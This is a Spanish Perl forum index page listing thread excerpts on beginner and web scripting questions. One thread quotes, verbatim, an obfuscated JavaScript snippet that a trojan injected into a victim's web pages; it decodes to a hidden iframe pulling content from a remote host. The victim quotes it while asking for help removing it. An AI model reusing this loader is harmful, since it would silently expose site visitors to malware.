• Publicidad

Fecha actual 2024-11-29 13:33 @606

News News of Mundo Perl

Site map of Mundo Perl » Foro : Mundo Perl

Mensajes entre usuarios en aplicación web

Hola ¿qué tal?, este es mi primer mensaje en los foros pero ya tengo tiempo visitando esta página.

Mi problema actual es que en mi siguiente proyecto me están pidiendo la posibilidad de poder enviar mensajes entre los usuarios de mi aplicación, o sea, por ejemplo yo tengo un área de administradores donde ciertos usuarios pueden entrar con su cuenta, pero entre ellos no hay forma de comunicarse, lo que necesito es poder enviar mensajes ...
Read more : Mensajes entre usuarios en aplicación web | Vistas : 1624 | Respuestas : 2 | Foro : Web

Buscar un archivo de Windows mediante un script

Hola, espero que me puedan ayudar... necesito por medio de un script buscar un archivo... pero este archivo se encuentra en una carpeta de Windows, y mi script lo quiero correr en Linux, porque ahí esta mi sistema... ¿cómo ven que se podrá hacer?

¡¡ Espero que alguien me pueda ayudar !!

¡¡ Gracias !!
Read more : Buscar un archivo de Windows mediante un script | Vistas : 1940 | Respuestas : 7 | Foro : Básico

Comprobar fichero no vacío

Hola a todos,

Tengo un proceso que se conecta mediante ssh a una máquina para leer los ficheros que residen en la misma.

Necesito comprobar que están todos los fichero y que no están vacíos.
¿Cómo puedo hacerlo?

Saludos y gracias
Read more : Comprobar fichero no vacío | Vistas : 887 | Respuestas : 4 | Foro : Básico

HTML::TableExtract

Hola:

Estoy intentando convertir tasas de cambio de moneda mediante xe.com y tengo un problema a la hora de extraer los datos de una tabla

1 #!/usr/bin/perl
2 use strict;
3 use warnings;
4 use LWP::UserAgent;
5 use HTML::TableExtract;
6
7 unless ( @ARGV == 3 ) {
8
9 print "usage: $0 amount from to\n";
10 print " example: $0 1000 usd eur\n";
11 exit( 1 );
12 }
13
14 my ( ...
Read more : HTML::TableExtract | Vistas : 685 | Respuestas : 2 | Foro : Básico

Ejemplo de módulo Find

¿Alguien tiene un ejemplo del uso del módulo "Find" en busca de permisos del sistema tipo:
find / -type d -perm -01111 -print
?
Saludos.
Read more : Ejemplo de módulo Find | Vistas : 5494 | Respuestas : 12 | Foro : Módulos

Problema con system()

¡¡Hola a todos!! Es mi primer post :$ He leído y buscado en el foro sobre mi problema pero no he encontrado nada parecido.

Estoy usando el siguiente comando en un programa Perl:

system("zmu -m 2 -E");

Funciona perfectamente, pero el problema que tengo es que el número "2" es variable y tendría que provenir de una variable llamada $id.

He probado concatenando así:

system("zmu -m ".$id." -E");

No me funciona T·T

Si alguien tiene ...
Read more : Problema con system() | Vistas : 719 | Respuestas : 4 | Foro : Básico

Perl ActiveState. Instalación y gestión con el PPM

Guía de instalación de ActivePerl. Gestión de módulos con PPM

Sigue una guía de instalación de la distribución Perl ActivePerl de la empresa ActiveState.

Además, cómo buscar y gestionar los módulos Perl con el programa gestor PPM, incluido en el ActivePerl.

1.- Descarga
2.- Instalación
3.- Gestión de módulos con PPM
3.1.- Definiciones
3.2.- Áreas de instalación
3.3.- Repositorios
3.4.- Módulos
3.5.- Documentación

1. Descarga

Conectándonos por Internet, al sitio ActivePerl.com. Llegamos a esta página: ...
Read more : Perl ActiveState. Instalación y gestión con el PPM | Vistas : 9098 | Respuestas : 0 | Foro : Formación

Script para eliminar inyección maliciosa en sitio web

Tengo un servidor dedicado por medio de Layered Tech. Hoy en la mañana me desperté con la desagradable noticia de que había sido atacado el servidor con un troyano que inyectó código a todas las páginas con extensión .html, .html, .php y .tpl.

El código que fue insertado después de cada </html> en cada uno de esos archivos es:

<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>

Es ...
Read more : Script para eliminar inyección maliciosa en sitio web | Vistas : 9826 | Respuestas : 18 | Foro : Avanzado

Variables argumentativas

Hola a todos :D

Me surgió la duda de las variables argumentativas, lo que yo quiero hacer es un script que trabaje por consola, o sea hacer algo como esto:
Code: Seleccionar todo
C:\Perl>Code.pl -n

Y que me compare el argumento "-n".

Estoy pensando en usar algo como esto, claro que está mal usado, aun no lo sé implementar:
#!/usr/bin/perl
if ($ARGV == "-n") {
print "Normal. \n";
} ...
Read more : Variables argumentativas | Vistas : 1034 | Respuestas : 6 | Foro : Básico

Problemas concatenando

¡Buenas gente! Estoy intentando concatenar dos variables utilizando el operador punto (.). Es curioso porque he estado haciendo pruebas simples y ha funcionado perfectamente (pongo el miniejemplo):

my $rtb="02";
my $bsc="CAT01B2";
print"$bsc\n";
$bsc=$bsc._.RTB.$rtb;
print"$bsc\n";

Pero cuando lo pego a la rutina principal (sin hacer cambio alguno), me aparece el siguiente error:

Bareword "_" not allowed while "strict subs" in use at Aplicacio_v6.pl line 188.
Bareword "RTB" not allowed while "strict subs" in use at Aplicacio_v6.pl ...
Read more : Problemas concatenando | Vistas : 861 | Respuestas : 5 | Foro : Básico

Identificarte  •  Registrarse

Estadísticas

Mensajes totales 36882 • Temas totales 7430 • Usuarios totales 1981